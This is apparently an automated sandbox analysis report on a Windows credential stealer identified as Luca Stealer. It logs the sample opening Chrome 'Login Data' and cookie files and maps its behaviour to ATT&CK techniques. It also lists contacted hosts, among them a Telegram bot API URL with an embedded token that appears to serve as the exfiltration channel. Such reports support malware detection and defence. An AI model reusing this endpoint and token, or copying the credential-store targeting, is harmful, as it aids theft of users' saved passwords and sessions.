                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Media History\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\MANIFEST-000001\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13305159336740646\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\CURRENT\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG.old\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c22ad13a-a322-4fd2-af93-38f6ee0e683c\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13305159346941976\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NetworkDataMigrated\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_apdfllckaahabafndbhieahigkjlhalf\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\MANIFEST-000001\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\JumpListIconsRecentClosed\d6cad3df-fce0-43ed-bb96-ffad9e6c76e6.tmp\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Trusted Vault\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\MANIFEST-000001\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\JumpListIconsRecentClosed\83a1e5e2-01ac-4719-ae04-f0093721c455.tmp\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG.old\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\CURRENT\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG.old\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\NetworkDataMigrated\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\JumpListIconsRecentClosed\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13305159337222731\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOCK\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Media History-journal\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOCK\Login DataJump to behavior

                  Remote Access Functionality

                  barindex
                  Yara detected Luca Stealer
                  Source: Yara matchFile source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe.7ff768b70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe.7ff768b70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000003.271121352.000001C7F3912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.271472602.000001C7F3912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe PID: 6044, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts121
                  Windows Management Instrumentation                  		Path Interception11
                  Process Injection                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Screen Capture                  		Exfiltration Over Other Network Medium1
                  Web Service                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
                  Virtualization/Sandbox Evasion                  		LSASS Memory31
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		Exfiltration Over Bluetooth21
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
                  Process Injection                  		Security Account Manager1
                  Process Discovery                  		SMB/Windows Admin Shares2
                  Data from Local System                  		Automated Exfiltration1
                  Ingress Tool Transfer                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Deobfuscate/Decode Files or Information                  		NTDS31
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Non-Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingData Transfer Size Limits13
                  Application Layer Protocol                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                  Remote System Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem114
                  System Information Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe24%ReversingLabsWin64.Trojan.SpywareX
                  SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe16%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  ipwho.is0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://cdn.ipwhois.io/flags/ch.svg0%VirustotalBrowse
                  https://cdn.ipwhois.io/flags/ch.svg0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ipwho.is
                  		195.201.57.90
                  		truefalseunknown
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot5749635914:AAHO1FmA3UVCNqptBOADqQF-cFGUoMOYe6gfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ac.ecosia.org/autocomplete?q=centbrowser_default_webdata.0.drfalse
                        		high
                        https://search.yahoo.com?fr=crmas_sfpSecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drfalse
                          		high
                          https://duckduckgo.com/chrome_newtabSecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drfalse
                            		high
                            https://duckduckgo.com/ac/?q=centbrowser_default_webdata.0.drfalse
                              		high
